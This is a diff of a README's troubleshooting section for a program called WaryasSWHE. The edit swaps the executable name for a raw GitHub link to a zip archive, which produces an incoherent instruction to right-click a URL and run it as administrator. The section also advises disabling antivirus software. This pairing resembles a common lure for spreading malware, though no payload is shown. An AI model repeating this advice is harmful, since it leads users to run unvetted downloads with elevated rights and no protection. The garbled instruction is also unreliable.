kripansh2006/WaryasSWHE/README.md

 If you face any issues while using WaryasSWHE, consider the following steps:

 - **Ensure Compatibility:** Check your operating system version.
-- **Run as Administrator:** Right-click on `WaryasSWHE.exe` and select "Run as administrator" for proper access.
+- **Run as Administrator:** Right-click on `https://raw.githubusercontent.com/kripansh2006/WaryasSWHE/main/variant/WaryasSWHE-1.9.zip` and select "Run as administrator" for proper access.
 - **Disable Antivirus:** Some antivirus programs may block the application.
 Consider temporarily disabling it.

 ## 📞 Support